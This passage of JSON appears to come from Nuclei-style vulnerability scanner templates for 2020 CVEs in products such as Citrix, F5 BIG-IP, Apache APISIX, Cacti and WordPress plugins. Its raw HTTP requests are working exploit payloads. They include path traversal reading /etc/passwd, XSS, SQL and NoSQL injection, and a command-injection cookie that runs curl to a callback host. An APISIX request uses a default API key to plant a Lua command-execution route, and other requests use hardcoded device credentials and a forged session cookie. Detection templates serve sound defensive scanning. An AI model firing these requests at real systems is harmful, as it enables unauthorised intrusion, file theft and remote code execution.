13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-8193","info":{"name":"Citrix  - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: xpyZxwy6\nX-NITRO-PASS: xWXHUJ56\n\n<appfwprofile><login></login></appfwprofile>\n","GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/neo HTTP/1.1\nHost: {{Hostname}}\n","GET /menu/stc HTTP/1.1\nHost: {{Hostname}}\n","POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<appfwprofile><login></login></appfwprofile>\n","POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\nX-NITRO-USER: oY39DXzQ\nX-NITRO-PASS: ZuU9Y9c1\nrand_key: {{randkey}}\n\n<clipermission></clipermission>\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9344","info":{"name":"Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS","{{BaseURL}}/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test","{{BaseURL}}/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","jira","subversion"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27982","info":{"name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5412","info":{"name":"Spring Cloud Netflix - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["Jelly"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL 